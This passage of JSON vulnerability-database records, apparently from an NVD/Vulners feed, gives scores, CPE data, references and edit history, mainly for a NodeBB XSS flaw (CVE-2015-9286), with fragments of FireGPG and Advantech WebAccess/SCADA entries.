"UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}, {"id": "CVE-2018-18999", "bulletinFamily": "NVD", "title": "CVE-2018-18999", "description": "WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack.", "published": "2018-12-19T18:29:00", "modified": "2020-09-18T16:53:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "reporter": "ics-cert@hq.dhs.gov", "references": ["http://www.securityfocus.com/bid/106245", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "https://www.tenable.com/security/research/tra-2018-45"], "cvelist": ["CVE-2018-18999"], "type": "cve", "lastseen": "2021-04-23T00:24:23", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "advantech:webaccess\\/scada", "name": "advantech webaccess\\/scada", "operator": "eq", "version": "8.3.2"}], "bulletinFamily": "NVD", "cpe": 